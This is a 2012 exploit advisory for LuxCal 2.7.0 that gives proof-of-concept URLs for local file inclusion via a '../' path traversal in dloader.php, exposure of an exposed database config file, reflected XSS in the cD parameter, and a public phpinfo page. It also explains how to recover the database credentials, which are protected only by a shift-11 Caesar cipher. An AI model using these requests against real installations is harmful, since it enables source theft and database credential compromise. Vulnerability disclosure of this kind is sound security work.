LuxCal 2.7.0 XSS / LFI / Information Disclosure

2012-09-17T00:00:00
ID PACKETSTORM:116606
Type packetstorm
Reporter L0n3ly-H34rT
Modified 2012-09-17T00:00:00

Description

                                        
                                            `#################################################  
### Exploit Title: LuxCal v2.7.0 Multiple Remote Vulnerabilities  
### Date: 17/09/2012   
### Author: L0n3ly-H34rT   
### Contact: l0n3ly_h34rt@hotmail.com   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://www.luxsoft.eu/  
### Software Link: http://www.luxsoft.eu/dloader.php?file=luxcal270.zip  
### Version: 2.7.0  
### Tested on: Linux/Windows   
#################################################  
  
1- Local File Inclusion :  
  
* P.O.C :  
  
http://127.0.0.1/luxcal270/dloader.php?fName=../index.php  
  
this is example for download the source of index script , you will see the source inside as name of affected file "dloader.php"  
  
2- Information Disclosure :  
  
* P.O.C :  
  
http://127.0.0.1/luxcal270/lcaldbc.dat  
  
- you will see the information of database but encrypte as Caesar cipher methode in shift 11 e.g. :  
  
LuxCal  
2.7.0  
p 5 {x 0;h 9 "adrpawdhi";x 1;h 4 "ajmm";x 2;h 4 "gddi";x 3;h 6 "000000";x 4;h 0 "";}  
  
- my information in database is :  
  
mysql server : localhost  
  
mysql username : root  
  
mysql password : 000000  
  
mysql database : luxx  
  
- when i install script all this name of information is encrypte and the word become as we see before in file "lcaldbc.dat" :  
  
mysql server : adrpawdhi  
  
mysql username : gddi  
  
mysql password : 000000  
  
mysql database : ajmm  
  
- you ask me how to decrypt that , you can decrypt by many ways but i give the easy way here :  
  
http://www.richkni.co.uk/php/crypta/caesar.php  
  
you can put your text and submit to decipher that word , then search in " Processed text - shift 11 "  
  
you will see your decrypted word ..  
  
3- XSS :  
  
* P.O.C :  
  
http://127.0.0.1/luxcal270/index.php?cD=[XSS]  
  
also some files is affected   
  
4- phpinfo () :  
  
http://127.0.0.1/luxcal270/pages/phpinfo.php  
  
############################################  
  
# Greetz to my friendz  
`